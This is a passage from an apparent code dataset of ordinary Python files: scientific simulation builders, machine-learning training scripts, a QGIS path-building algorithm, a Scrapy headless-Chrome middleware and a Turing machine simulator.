destinations (excepting wildcards).\n\n    @property\n    def src(self):\n        \"\"\"Returns the path on the caller's client.\"\"\"\n        return self._src\n\n    @src.setter\n    def src(self, src):\n        self._src = src\n\n    @property\n    def dst(self):\n        return self._dst\n\n    @dst.setter\n    def dst(self, dst):\n        self._dst = dst\n\n    @property\n    def src_type(self):\n        return self._src_type\n\n    @property\n    def dst_type(self):\n        return self._dst_type\n\n    @src_type.setter\n    def src_type(self, t):\n        self._src_type = t\n\n    @dst_type.setter\n    def dst_type(self, t):\n        self._dst_type = t\n\n    @property\n    def recurse(self):\n        return self._recurse\n\n    @recurse.setter\n    def recurse(self, r):\n        self._recurse = r\n\n    @property\n    def acl(self):\n        return self._acl\n\n    @acl.setter\n    def acl(self, acl_):\n        self._acl = acl_\n\n    def __repr__(self):\n        return '<copy to={} from={} recurse={} {}/>'.format(\n            self._dst, self._src, self._recurse, self._acl)\n\n\nclass ConfigType(object):\n    UNKNOWN = 0\n    KERNEL_FRAGMENT = 1\n    SELINUX_POLICY = 2\n    NAMES = {'kernel-fragment': KERNEL_FRAGMENT,\n             'sepolicy': SELINUX_POLICY}\n\n    @staticmethod\n    def get(type_name):\n        if type_name in ConfigType.NAMES:\n            return ConfigType.NAMES[type_name]\n        return ConfigType.UNKNOWN\n\n\nclass Config(object):\n    def __init__(self, pack):\n        self._pack = pack\n        self._path = ()\n        self._type = ConfigType.UNKNOWN\n        self._origin = common.Origin()\n\n    @property\n    def pack(self):\n        return self._pack\n\n    def load(self, ele):\n        \"\"\"Loads the Config from a XML element node (config).\"\"\"\n        ele.limit_attribs(['path', 'type'])\n        self._origin = ele.origin.copy()\n        self._path = common.path_to_host(ele.get_attrib('path'))\n        if not isinstance(self._path, basestring):\n            raise common.LoadErrorWithOrigin(ele.origin,\n                                             'Failed to parse \"path\" attribute')\n\n        # Anchor a relative path to the origin's location.\n        if not os.path.isabs(self._path):\n            base_path = os.path.dirname(self._origin.source_file)\n            self._path = os.path.abspath(os.path.join(base_path, self._path))\n        if self._path.endswith(os.sep):\n            raise common.LoadErrorWithOrigin(\n                self._origin,\n                '@path must specify a file and not a directory: {}'.format(\n                    self._path))\n        self._type = ConfigType.get(ele.get_attrib('type'))\n        if self._type == ConfigType.UNKNOWN:\n            raise common.LoadErrorWithOrigin(\n                self._origin,\n                '@type must be one of {}'.format(ConfigType.NAMES.keys()))\n\n    @property\n    def path(self):\n        return self._path\n\n    def __repr__(self):\n        return '= x >= start_min else 0)\n    count_end.apply_(lambda x: 1 if end_max >= x >= end_min else 0)\n\n    valid_solutions = Tensor([1 if s == 1 and e == 1 else 0\n                              for s, e in zip(count_start, count_end)])\n\n    return count_start.mean(), count_end.mean(), valid_solutions.mean()\n\n# Start training\nfixed_noise = torch.randn(128, latent_size, 1, 1, device=device)\n\nhistory = {'lossD': [], 'lossG': [], 'avgStart': [], 'avgEnd': [],\n           'valid': [], 'validHist': [], 'imgs': [],'epoch': []}\n\nfor epoch in range(n_epochs):\n\n    for i, data in enumerate(loader['train']):\n\n        x_real = data['moves'].type(Tensor)\n\n        if epoch == 0 and i == 0:\n            viz.images(\n                x_real[:16].flip(2),\n                opts=dict(title='Epoch' + str(epoch), width=1000, height=250)\n            )\n\n        netD.zero_grad()\n\n        # Draw a batch of random latent vectors and generate fake images from them\n        z = torch.randn(x_real.size(0), latent_size, 1, 1, device=device)\n        x_fake = netG(z)\n\n        # Compute the penalties (defined in the functions above)\n        penalty = 0.1 * channel_penalty(x_fake, start_max, end_max, start_min, end_min) \\\n                  + 0.1 * duplicate_penalty(x_fake) if epoch > 100 else 
torch.zeros([x_real.size(0), 1], device=device)\n\n\n        # Score the real and the fake images with the discriminator\n        out_real = netD((x_real, torch.zeros([x_real.size(0), 1], device=device)))\n        out_fake = netD((x_fake, penalty))\n\n        # Wasserstein critic loss: mean fake score minus mean real score,\n        # plus the gradient penalty term\n        lossD = torch.mean(out_fake) - torch.mean(out_real) \\\n                + lmbda * gradient_penalty(netD, x_real.data, x_fake.data)\n\n        # Backpropagate and step the discriminator optimizer\n        lossD.backward(retain_graph=True)\n        optimizerD.step()\n\n        # Train the generator once every n_critic iterations\n        if i % n_critic == 0:\n\n            netG.zero_grad()\n\n            # Generate a fake batch\n            x_fake = netG(z)\n\n            # Compute the penalties for this batch\n            penalty = 0.1 * channel_penalty(x_fake, start_max, end_max, start_min, end_min) \\\n                      + 0.1 * duplicate_penalty(x_fake) if epoch > 100 else torch.zeros([x_real.size(0), 1], device=device)\n\n            # Score the fake batch (with its penalty) using the discriminator\n            out_fake = netD((x_fake, penalty))\n\n            lossG = -torch.mean(out_fake)\n\n            lossG.backward()\n            optimizerG.step()\n\n        # Print training stats\n        if i % n_print == 0:\n            print(\n                \"[Epoch {:5}/{:5}] [Batch {:3}/{:3}] [D loss: {:2.6f}] [G loss: {:2.6f}]\".format(\n                    epoch, n_epochs, i, len(loader['train']), lossD.item(), lossG.item()\n                )\n            )\n\n\n    # Save losses in history and update plot\n    with torch.no_grad():\n        history['imgs'] += [netG(fixed_noise).detach().cpu()]\n        avgStart, avgEnd, valid = avg_start_end(history['imgs'][-1].detach(), start_max, end_max, start_min, end_min)\n\n        history['lossD'] += [lossD.item()]\n        history['lossG'] += [lossG.item()]\n        history['avgStart'] += [avgStart.item()]\n        history['avgEnd'] += [avgEnd.item()]\n        history['valid'] += [valid.item()]\n        history['validHist'] += [sum(history['valid'][-20:]) / len(history['valid'][-20:])]\n        history['epoch'] += [epoch]\n\n        viz.line(\n            Y=Tensor(history['lossD']),\n            X=Tensor(history['epoch']),\n            win=winD,\n            update='replace'\n        )\n\n        viz.line(\n            Y=Tensor(history['lossG']),\n            X=Tensor(history['epoch']),\n            win=winG,\n            update='replace'\n        )\n\n        viz.line(\n            Y=Tensor(history['valid']),\n            X=Tensor(history['epoch']),\n            win=winValid,\n            update='replace'\n        )\n\n        viz.line(\n            Y=Tensor(history['validHist']),\n            X=Tensor(history['epoch']),\n            win=winValidHist,\n            update='replace'\n        )\n\n        if epoch % 10 == 0:\n            viz.images(\n                history['imgs'][-1][:16].detach().round_().flip(2),\n                opts=dict(title='Epoch' + str(epoch), width=1000, height=250)\n            )\n\nfor i, img in enumerate(history['imgs'][-1].detach().round_().flip(2)):\n    torchvision.utils.save_image(img, '../results/img/fake/' + str(i) + '.png')\n\nS = 0\nfor data in loader['train']:\n    x_real = data['moves'].type(Tensor).flip(2)\n    for i, img in enumerate(x_real):\n        torchvision.utils.save_image(img, '../results/img/real/' + str(S + i) + '.png')\n    S += x_real.size(0)\n\n\n# Save training output data into json file\nimport json\n\nwith open(\"../results/history\" + \"_nopenalties\" + \"_seed\" + str(seed) + \".csv\", \"w\") as history_file:\n    json.dump(\n        {k: history[k] for k in ('epoch', 'lossD', 'lossG', 'valid', 'validHist')},\n        history_file\n    )\n","sub_path":"py/main_pinput.py","file_name":"main_pinput.py","file_ext":"py","file_size_in_byte":9154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"}
+{"seq_id":"643819991","text":"from 
google.appengine.ext import db\nimport sys\n\nprint(sys.path)\n\nfrom blog import render_str\nfrom post import Post\nfrom users import Accounts\n\n\nclass Comments(db.Model):\n    post_id = db.ReferenceProperty(Post, required=True)\n    user = db.ReferenceProperty(Accounts, required=True)\n    comment = db.TextProperty(required=True)\n    created = db.DateTimeProperty(auto_now_add=True)\n\n    def render(self):\n        self._render_text = self.comment.replace('\\n', '<br>
')\n return render_str(\"comment.html\", c=self)\n\n @classmethod\n def add_comment(cls, postkey, user, comment):\n comment = Comments(post_id=postkey, user=user, comment=comment)\n comment.put()\n","sub_path":"models/comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"234926252","text":"import numpy as np\nfrom sklearn import svm\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.cluster import KMeans\n\nx= np.asarray([[0,0],[1,0],[0,1],[1,1]])\ny=np.asarray([0,1,1,0])\nd=np.load('data4.npy')\nt=np.load('targ4.npy')\nD=np.abs(d);\nd0=D[:,0]\nd1=D[:,1]\nd2=D[:,2]\nd3=D[:,3]\nd4=D[:,4]\nd5=D[:,5]\nd6=D[:,6]\ndata=np.log10(np.transpose(np.array([d0*d1,d2,d3,d4,d5,d6])))\nmlp = MLPClassifier(hidden_layer_sizes=(100,10,100,100))\nmlp.fit(data,t)\nprint(mlp.predict(data[22:27]))","sub_path":"mpl_trainig.py","file_name":"mpl_trainig.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"418251050","text":"# Make linked list of monomers, atoms. Atactic polystyrene\n# Derek Fujimoto\n# Nov 2017\n\nimport numpy as np\nfrom monomer_node import monomer_node as monomer\nfrom atom_node import atom_node as atom\nfrom polymer_properties import *\nimport random\nfrom data import data\n\nclass polymer_linked(object):\n \"\"\"\n Data fields:\n atoms # list of atoms\n directions # build direction based on plane[0]\n last_atom_id# id number of the last atom in the polymer\n mol # molecule number\n monomers # list of monomers\n nmono # number of monomers \n plane # build plane\n \"\"\"\n \n# =========================================================================== # \n def __init__(self,head_pos,idn_first_atom,mol,nmono=10,plane='xy'):\n \"\"\"\n head_pos: position of first CH2 atom in first monomer\n idn_first_atom: id number of first atom in first monomer\n nmono: number of monomers per polymer chain\n plane: plane to build in. Monomers along plane[0]. Rings along \n plane[1]\n \"\"\"\n \n # set\n self.nmono = nmono\n self.plane = plane\n self.monomers = []\n self.mol = mol\n \n # pick monomer build direction\n if plane[0] == 'x': self.direction = np.array([1,0,0])\n elif plane[0] == 'y': self.direction = np.array([0,1,0])\n elif plane[0] == 'z': self.direction = np.array([0,0,1])\n\n # Build monomers\n self.build(head_pos,idn_first_atom)\n \n# =========================================================================== #\n def atom_list_nested_2_id(self,atoms):\n \"\"\"\n Recursively turn a list of atom objects into id numbers. 
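Returns the same nested structure with every atom node replaced by its idn.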
\n \"\"\"\n if type(atoms) == list:\n return [self.atom_list_nested_2_id(a) for a in atoms]\n else:\n return atoms.idn\n\n# =========================================================================== #\n def build(self,head_pos,id_start):\n \"\"\"Make polymer chain\"\"\"\n \n # make the first monomer\n m = monomer(head_pos,id_start,mol=self.mol,plane=self.plane)\n self.monomers.append(m)\n \n # make nmono monomers\n for i in xrange(1,self.nmono):\n \n # last atom in previous monomer\n last_prev = self.monomers[-1].last\n id_next = self.monomers[-1].atoms[-1].idn+1\n \n # get orientation\n downup = random.randint(0,1) # 0 == up, 1 == down\n headtail = 0#random.randint(0,1) # 0 == tail, 1 == head #########\n \n # make a monomer and choose head/tail orientation\n if headtail:\n m = monomer(last_prev.pos,id_next,self.mol,1,0,self.plane)\n m.flip(self.plane[0])\n else:\n m = monomer(last_prev.pos,id_next,self.mol,0,1,self.plane)\n \n # choose up/down orientation\n if downup:\n m.flip(self.plane[1])\n \n # shift position \n dx_actual = last_prev.pos-m.first.pos \n dx_target = key_lookup(bond_len,\"%s-%s\"%\\\n (last_prev.species,m.first.species ))*self.direction\n m.translate(dx_target+dx_actual)\n \n # bond atoms in monomers together\n last_prev.bonded.append(m.first)\n m.first.bonded.append(last_prev)\n \n # append\n self.monomers.append(m)\n \n # get the full list of atoms\n self.atoms = []\n for m in self.monomers:\n for a in m.atoms:\n self.atoms.append(a)\n \n # add one final atom to the chain\n if self.monomers[-1].last.species != 'ch2':\n \n # get position\n last_prev = self.monomers[-1].last\n dx = key_lookup(bond_len,\"%s-%s\"%(last_prev.species,'ch2'))\n pos = last_prev.pos + dx*self.direction\n self.last_atom_id = self.monomers[-1].atoms[-1].idn+1\n a = atom('ch2',self.last_atom_id,self.mol,pos)\n \n # bonding\n a.bonded.append(last_prev)\n last_prev.bonded.append(a)\n \n # add\n self.atoms.append(a)\n \n return\n\n# =========================================================================== #\n def get_atom_by_idn(self,idn):\n for a in self.atoms:\n if a.idn == idn:\n return a\n return -1\n\n# =========================================================================== #\n def get_angles(self,coeff=False):\n \"\"\"\n Find all angles. Assign types matching set coeffs. 
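Angle types are looked up by the species of each path's central atom.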
\n \n Return (coeff,assignments)\n \"\"\"\n \n type_id = type2num(angle_angle)\n \n # get bond coeffs ---------------------------------------------------\n if coeff:\n angle_coeff = []\n for ang in type_id.keys():\n epsilon = angle_energy[ang]*j2cal\n theta = angle_angle[ang]\n angle_coeff.append(\"%d %f %f\\n\" % (type_id[ang],epsilon,theta))\n return angle_coeff\n \n # get list of all angles ---------------------------------------------\n else:\n line = \"%d %d %d %d %d\\n\" # id type atom1 atom2 atom3\n \n # get the head atom\n atom = self.monomers[0].atoms[0]\n \n # walk the atom list\n visited,angles = self.path_walker(self.monomers[0].atoms[0],1)\n angle_lines = []\n for i,a in enumerate(angles):\n species1 = self.get_atom_by_idn(a[0]).species\n species2 = self.get_atom_by_idn(a[1]).species\n species3 = self.get_atom_by_idn(a[2]).species\n species_num = key_lookup(type_id,species2)\n \n angle_lines.append(line % (i+1,species_num,a[0],a[1],a[2]))\n return angle_lines\n\n# =========================================================================== #\n def get_atoms(self,coeff=False):\n \"\"\"\n Set atom locations.\n \n Return (masses,positions)\n \"\"\"\n type_id = type2num(nonbond_len)\n \n # mass\n if coeff:\n masses = []\n for k in mass.keys():\n idn = type_id[k]\n masses.append(\"%d %f\\n\" % (idn,mass[k]))\n return masses\n \n # atom positions\n else:\n atom_pos = []\n for a in self.atoms:\n s = \"%d %d %d \" % (a.idn,a.mol,type_id[a.species])\n s += \"%f %f %f \" % tuple(a.pos)\n s += \"%f %f %f\\n\" % (0,0,0) # images\n atom_pos.append(s) \n return atom_pos\n\n# =========================================================================== #\n def get_bonds(self,coeff=False):\n \"\"\"\n Find all bonds. Assign types matching set coeffs. \n \n Return (coeff,assignments)\n \"\"\"\n \n type_id = type2num(bond_len)\n \n # get bond coeffs ---------------------------------------------------\n if coeff:\n \n bond_coeff = []\n for b in type_id.keys():\n epsilon = bond_energy[b]*j2cal\n sigma = bond_len[b]\n bond_coeff.append(\"%d %f %f\\n\" % (type_id[b],epsilon,sigma))\n return bond_coeff\n \n # get list of all bonds ---------------------------------------------\n else:\n line = \"%d %d %d %d\\n\" # id type atom1 atom2\n \n # get the head atoms\n atom = self.monomers[0].atoms[0]\n \n # walk the atom list\n visited,bonds = self.path_walker(self.monomers[0].atoms[0],0)\n bond_lines = []\n for i,b in enumerate(bonds):\n species1 = self.get_atom_by_idn(b[0]).species\n species2 = self.get_atom_by_idn(b[1]).species\n species_num = key_lookup(type_id,'%s-%s'%(species1,species2))\n \n bond_lines.append(line % (i+1,species_num,b[0],b[1]))\n return bond_lines\n\n# =========================================================================== #\n def get_dihedrals(self,coeff=False):\n \"\"\"\n Find all dihedrals. Assign types matching set coeffs. 
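Dihedral types are looked up by the species of the two middle atoms in each four-atom path.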
\n \n Return (coeff,assignments)\n \"\"\"\n \n type_id = type2num(dihedral_energy)\n \n # get bond coeffs ---------------------------------------------------\n if coeff:\n \n dihedral_coeff = []\n for b in type_id.keys():\n epsilon = dihedral_energy[b]*j2cal\n n = dihedral_n[b]\n d = dihedral_d[b]\n dihedral_coeff.append(\"%d %f %d %d\\n\" % \\\n (type_id[b],epsilon,int(d),int(n)))\n return dihedral_coeff\n \n # get list of all dihedrals ----------------------------------------\n else:\n line = \"%d %d %d %d %d %d\\n\" # id type atom1 atom2 atom3 atom4\n \n # get the head atoms\n atom = self.monomers[0].atoms[0]\n \n # walk the atom list\n visited,dihedrals = self.path_walker(self.monomers[0].atoms[0],2)\n dihedral_lines = []\n for i,b in enumerate(dihedrals):\n species1 = self.get_atom_by_idn(b[0]).species\n species2 = self.get_atom_by_idn(b[1]).species\n species3 = self.get_atom_by_idn(b[2]).species\n species4 = self.get_atom_by_idn(b[3]).species\n species_num = key_lookup(type_id,'%s-%s'%(species2,species3))\n \n dihedral_lines.append(line % (i+1,species_num,b[0],b[1],b[2],b[3]))\n return dihedral_lines\n\n# =========================================================================== #\n def get_impropers(self,coeff=False):\n \"\"\"\n Find all impropers. Assign types matching set coeffs. \n \n Return (coeff,assignments)\n \"\"\"\n \n type_id = type2num(improper_energy)\n \n # get improper coeffs ---------------------------------------------------\n if coeff: \n improper_coeff = []\n for b in type_id.keys():\n epsilon = improper_energy[b]*j2cal\n n = improper_n[b]\n d = improper_d[b]\n improper_coeff.append(\"%d %f %d %d\\n\" % \\\n (type_id[b],epsilon,int(d),int(n)))\n return improper_coeff\n \n # get list of all impropers ----------------------------------------\n else:\n # get list of 3-paths eminating from target points\n good_keys = improper_energy.keys()\n paths = {}\n for k in good_keys:\n paths[k] = []\n \n for a in self.atoms:\n ptests = self.path_depth_walker(a,depth=1)\n for p in ptests:\n if p[1].species in good_keys:\n paths[p[1].species].append(p)\n \n # find the fourth members: the odd man out\n for k in paths.keys():\n for p in paths[k]:\n core_atom = p[1]\n for b in core_atom.bonded:\n if not b in p:\n p.append(b)\n break\n \n # translate to numbers\n paths[k] = self.atom_list_nested_2_id(paths[k])\n \n line = \"%d %d %d %d %d %d\\n\" # id type atom1 atom2 atom3 atom4\n \n # get the head atoms\n atom = self.monomers[0].atoms[0]\n \n # print\n i=1\n impropers = []\n for k in paths.keys():\n for p in paths[k]:\n species1 = self.get_atom_by_idn(p[0]).species\n species2 = self.get_atom_by_idn(p[1]).species\n species3 = self.get_atom_by_idn(p[2]).species\n species4 = self.get_atom_by_idn(p[3]).species\n species_num = key_lookup(type_id,'%s'%species2)\n \n impropers.append(line%(i,species_num,p[0],p[1],p[2],p[3]))\n i += 1\n return impropers\n\n# =========================================================================== #\n def get_pairs(self):\n \"\"\"\n Find all unique pair combinations and set list of pair potential \n values. 
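Pair coefficients use Lorentz-Berthelot style mixing: geometric-mean energies and arithmetic-mean lengths. 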
Use only the first monomer for the search.\n \"\"\"\n\n # get all unique species types\n m = self.monomers[0]\n species = np.unique([a.species for a in m.atoms])\n \n # get all permutations of pair types\n permutations = [[a,b] for a in species for b in species]\n \n # get atom numerical species numbers\n type_id = type2num(nonbond_len)\n\n # iterate over pair permutations and make strings for pair lines\n pair_coeff = []\n pairij_coeff = []\n for p in permutations:\n epsilon = np.sqrt(nonbond_energy[p[0]]*nonbond_energy[p[1]])*j2cal\n sigma = (nonbond_len[p[0]]+nonbond_len[p[1]])/2.\n \n p_num = [type_id[pi] for pi in p]\n \n p1 = np.min(p_num)\n p2 = np.max(p_num)\n \n if p1 == p2:\n pair_coeff.append(\"%d %d %f %f %f\\n\" % \\\n (p1,p2,epsilon,sigma,nonbond_cutoff))\n else:\n s = \"%d %d %f %f %f\\n\" % (p1,p2,epsilon,sigma,nonbond_cutoff)\n if not s in pairij_coeff:\n pairij_coeff.append(s)\n return (pair_coeff,pairij_coeff)\n \n# =========================================================================== #\n def path_depth_walker(self,atom,depth=1,exclude=None):\n \"\"\"\n Walk the atom graph a distance depth. Return all available paths.\n \"\"\"\n \n # exclude list\n if exclude == None:\n exclude = set([atom])\n else:\n exclude.add(atom)\n \n # end condition\n if depth < 0:\n return [[atom]]\n \n # add to visited\n paths = []\n \n # visit all atoms in atom's bonded list\n for a in atom.bonded:\n for path in self.path_depth_walker(a,depth-1):\n if not atom in path:\n paths.append([atom]+path)\n exclude.remove(atom)\n \n # finish\n return paths\n\n# =========================================================================== #\n def path_walker(self,atom,pathlen=1,visited=None,paths=None):\n \"\"\"\n Walk the atom graph. Return all paths of length \"depth\".\n \n Step1: Walk over all atoms in the graph. Assume this atom is the \n start of the path\n \n Step2: At each atom attempt to find a path by walking again at a \n depth of pathlen into the graph.\n \"\"\"\n \n # new memory assignment\n if visited == None:\n visited = []\n if paths == None:\n paths = []\n \n # end condition\n if atom.idn in visited:\n return (visited,paths)\n \n # add to visited\n visited.append(atom.idn)\n \n # add to path list\n pathlist = self.path_depth_walker(atom,depth=pathlen)\n paths.extend(self.atom_list_nested_2_id(pathlist))\n \n # remove duplicates independent of ordering\n u,i = np.unique(np.sort(paths,axis=1),axis=0,return_index=True)\n paths = np.array(paths)[i].tolist()\n \n # visit all atoms in atom's bonded list\n for a in atom.bonded:\n visited,paths = self.path_walker(a,pathlen,visited,paths)\n \n # finish\n return (visited,paths)\n","sub_path":"sim_builder/polymer_linked.py","file_name":"polymer_linked.py","file_ext":"py","file_size_in_byte":16383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"558002505","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n***************************************************************************\n PointsToPaths.py\n ---------------------\n Date : April 2014\n Copyright : (C) 2014 by Alexander Bruy\n Email : alexander dot bruy at gmail dot com\n***************************************************************************\n* *\n* This program is free software; you can redistribute it and/or modify *\n* it under the terms of the GNU General Public License as published by *\n* the Free Software Foundation; either version 2 of the License, or *\n* (at your option) any later version. 
*\n* *\n***************************************************************************\n\"\"\"\n\n__author__ = 'Alexander Bruy'\n__date__ = 'April 2014'\n__copyright__ = '(C) 2014, Alexander Bruy'\n\n# This will get replaced with a git SHA1 when you do a git archive\n\n__revision__ = '$Format:%H$'\n\nimport os\nfrom datetime import datetime\n\nfrom PyQt4.QtCore import QVariant\nfrom qgis.core import QGis, QgsFeature, QgsFields, QgsField, QgsGeometry, QgsDistanceArea\n\nfrom processing.core.GeoAlgorithm import GeoAlgorithm\nfrom processing.core.parameters import ParameterVector\nfrom processing.core.parameters import ParameterTableField\nfrom processing.core.parameters import ParameterString\nfrom processing.core.outputs import OutputVector\nfrom processing.core.outputs import OutputDirectory\nfrom processing.tools import dataobjects, vector\n\n\nclass PointsToPaths(GeoAlgorithm):\n\n VECTOR = 'VECTOR'\n GROUP_FIELD = 'GROUP_FIELD'\n ORDER_FIELD = 'ORDER_FIELD'\n DATE_FORMAT = 'DATE_FORMAT'\n #GAP_PERIOD = 'GAP_PERIOD'\n OUTPUT_LINES = 'OUTPUT_LINES'\n OUTPUT_TEXT = 'OUTPUT_TEXT'\n\n def defineCharacteristics(self):\n self.name, self.i18n_name = self.trAlgorithm('Points to path')\n self.group, self.i18n_group = self.trAlgorithm('Vector creation tools')\n self.addParameter(ParameterVector(self.VECTOR,\n self.tr('Input point layer'), [ParameterVector.VECTOR_TYPE_POINT]))\n self.addParameter(ParameterTableField(self.GROUP_FIELD,\n self.tr('Group field'), self.VECTOR))\n self.addParameter(ParameterTableField(self.ORDER_FIELD,\n self.tr('Order field'), self.VECTOR))\n self.addParameter(ParameterString(self.DATE_FORMAT,\n self.tr('Date format (if order field is DateTime)'), '', optional=True))\n #self.addParameter(ParameterNumber(\n # self.GAP_PERIOD,\n # 'Gap period (if order field is DateTime)', 0, 60, 0))\n self.addOutput(OutputVector(self.OUTPUT_LINES, self.tr('Paths')))\n self.addOutput(OutputDirectory(self.OUTPUT_TEXT, self.tr('Directory')))\n\n def processAlgorithm(self, progress):\n layer = dataobjects.getObjectFromUri(\n self.getParameterValue(self.VECTOR))\n groupField = self.getParameterValue(self.GROUP_FIELD)\n orderField = self.getParameterValue(self.ORDER_FIELD)\n dateFormat = unicode(self.getParameterValue(self.DATE_FORMAT))\n #gap = int(self.getParameterValue(self.GAP_PERIOD))\n dirName = self.getOutputValue(self.OUTPUT_TEXT)\n\n fields = QgsFields()\n fields.append(QgsField('group', QVariant.String, '', 254, 0))\n fields.append(QgsField('begin', QVariant.String, '', 254, 0))\n fields.append(QgsField('end', QVariant.String, '', 254, 0))\n writer = self.getOutputFromName(self.OUTPUT_LINES).getVectorWriter(\n fields, QGis.WKBLineString, layer.dataProvider().crs())\n\n points = dict()\n features = vector.features(layer)\n total = 100.0 / len(features)\n for current, f in enumerate(features):\n point = f.geometry().asPoint()\n group = f[groupField]\n order = f[orderField]\n if dateFormat != '':\n order = datetime.strptime(unicode(order), dateFormat)\n if group in points:\n points[group].append((order, point))\n else:\n points[group] = [(order, point)]\n\n progress.setPercentage(int(current * total))\n\n progress.setPercentage(0)\n\n da = QgsDistanceArea()\n\n current = 0\n total = 100.0 / len(points)\n for group, vertices in points.iteritems():\n vertices.sort()\n f = QgsFeature()\n f.initAttributes(len(fields))\n f.setFields(fields)\n f['group'] = group\n f['begin'] = vertices[0][0]\n f['end'] = vertices[-1][0]\n\n fileName = os.path.join(dirName, '%s.txt' % group)\n\n fl = 
open(fileName, 'w')\n            fl.write('angle=Azimuth\\n')\n            fl.write('heading=Coordinate_System\\n')\n            fl.write('dist_units=Default\\n')\n\n            line = []\n            i = 0\n            for node in vertices:\n                line.append(node[1])\n\n                if i == 0:\n                    fl.write('startAt=%f;%f;90\\n' % (node[1].x(), node[1].y()))\n                    fl.write('survey=Polygonal\\n')\n                    fl.write('[data]\\n')\n                else:\n                    angle = line[i - 1].azimuth(line[i])\n                    distance = da.measureLine(line[i - 1], line[i])\n                    fl.write('%f;%f;90\\n' % (angle, distance))\n\n                i += 1\n\n            # Close this group's file before starting the next one\n            fl.close()\n\n            f.setGeometry(QgsGeometry.fromPolyline(line))\n            writer.addFeature(f)\n            current += 1\n            progress.setPercentage(int(current * total))\n\n        del writer\n","sub_path":"processing/algs/qgis/PointsToPaths.py","file_name":"PointsToPaths.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"}
+{"seq_id":"26681195","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your spider middleware\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n\nfrom selenium import webdriver\nimport scrapy\nimport time\n\n\n# Custom downloader middleware backed by a headless Chrome browser\nclass ChromeMidddlewares(object):\n    def process_request(self, request, spider):\n        url = request.url\n        if url != 'https://www.aqistudy.cn/historydata/':\n            # 1. Create the browser object\n            options = webdriver.ChromeOptions()\n            options.add_argument('--headless')\n            options.add_argument('--disable-gpu')\n            driver = webdriver.Chrome(options=options)\n\n            # 2. Send the request\n            driver.get(url)\n\n            # Be sure to wait for the page to render\n            time.sleep(3)\n\n            # 3. Grab the page source\n            data = driver.page_source\n\n            # 4. Close the browser\n            driver.quit()\n\n            # Wrap the content fetched by the custom downloader in an HtmlResponse with:\n            # url\n            # body\n            # encoding='utf-8'\n            # request\n            return scrapy.http.HtmlResponse(url=url, body=data.encode('utf-8'), encoding=\"utf-8\", request=request)\n","sub_path":"scrapy_pro/laoshi04/AQI/AQI/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"}
+{"seq_id":"579978812","text":"#!usr/bin/python\r\n# -*- coding:utf-8 -*-\r\n\r\n\r\nfrom data import read_file, check, new_word, put_head, rm_space\r\nfrom Block import Block\r\n\r\n\r\nSTEPS_MAX = 500\r\n\r\n\r\nclass TuringMachine():\r\n\r\n    def __init__(self, file, config):\r\n\r\n        self.exec_type = 'v'\r\n        self.steps = STEPS_MAX\r\n        self.delimiter = ['(', ')']\r\n        if config is not None:\r\n            self.set_config(config)\r\n        self.blocks = {}\r\n        self.build_tm_sim(file)\r\n        self.exec_stack = []\r\n        self.current_block = 'main'\r\n        self.current_state = self.blocks[self.current_block].init_state\r\n        self.word = 'aba'\r\n        self.len_word = len(self.word)\r\n        self.second_tape = '-'\r\n        self.head = 0\r\n        self.reading = ''\r\n        self.finalize = False\r\n        self.break_point = False\r\n\r\n    def build_tm_sim(self, file):\r\n        lines = read_file(file)\r\n        i = 0\r\n        while i < len(lines):\r\n            line = lines[i]\r\n            if line[0] == 'bloco' and (len(line) == 3 or len(line) == 4):\r\n                name = line[1]\r\n                init_state = line[2]\r\n                self.blocks[name] = Block(init_state)\r\n                i += 1\r\n                line = lines[i]\r\n                while line[0] != 'fim':\r\n                    if check(line):\r\n                        self.blocks[name].add_state(line)\r\n                    else:\r\n                        self.finalize = True\r\n                        break\r\n                    i += 1\r\n                    line = lines[i]\r\n            else:\r\n                print('Arquivo não está no formato correto.')\r\n                self.finalize = True\r\n            i += 1\r\n\r\n    def set_config(self, config):\r\n        self.set_type_execution(config)\r\n        if \"-head\" in config:\r\n            i = config.index(\"-head\")\r\n            self.delimiter = [config[i+1][0], 
config[i+1][1]]\r\n\r\n    def up_config(self, config):\r\n        if config != []:\r\n            self.set_type_execution(config)\r\n\r\n    def set_type_execution(self, config):\r\n        if ('-step' in config) or ('-s' in config):\r\n            if '-step' in config:\r\n                i = config.index('-step')\r\n            else:\r\n                i = config.index('-s')\r\n            try:\r\n                self.steps = int(config[i+1])\r\n            except (ValueError, IndexError):\r\n                pass\r\n            self.exec_type = 's'\r\n        else:\r\n            if ('-resume' in config) or ('-r' in config):\r\n                self.exec_type = 'r'\r\n                self.steps = STEPS_MAX\r\n            elif ('-verbose' in config) or ('-v' in config):\r\n                self.exec_type = 'v'\r\n                self.steps = STEPS_MAX\r\n\r\n###############################################################################\r\n\r\n    def execute(self):\r\n        for _ in range(self.steps):\r\n            if self.exec_type != 'r':\r\n                print(self.instant_config())\r\n            else:\r\n                self.instant_config()\r\n            self.do_transition()\r\n            if self.break_point:\r\n                self.break_point = False\r\n                break\r\n            if self.finalize:\r\n                return\r\n\r\n    def instant_config(self):\r\n        self.word, word = put_head(self.word, self.head, self.delimiter)\r\n        return '{:.>16}'.format(self.current_block) + '.' + \\\r\n            '{:0>4}'.format(self.current_state) + ' : ' + \\\r\n            '{:_^43}'.format(word) + ' : ' + self.second_tape\r\n\r\n    def do_transition(self):\r\n        state = self.blocks[self.current_block].states[self.current_state]\r\n        self.reading = self.word[self.head]\r\n\r\n        # execute the matching transition\r\n        if (self.reading in state.transitions) or ('*' in state.transitions):\r\n            if self.reading in state.transitions:\r\n                t = state.transitions[self.reading]\r\n            else:\r\n                t = state.transitions['*']\r\n            self.transition(t)\r\n        else:\r\n            # second tape\r\n            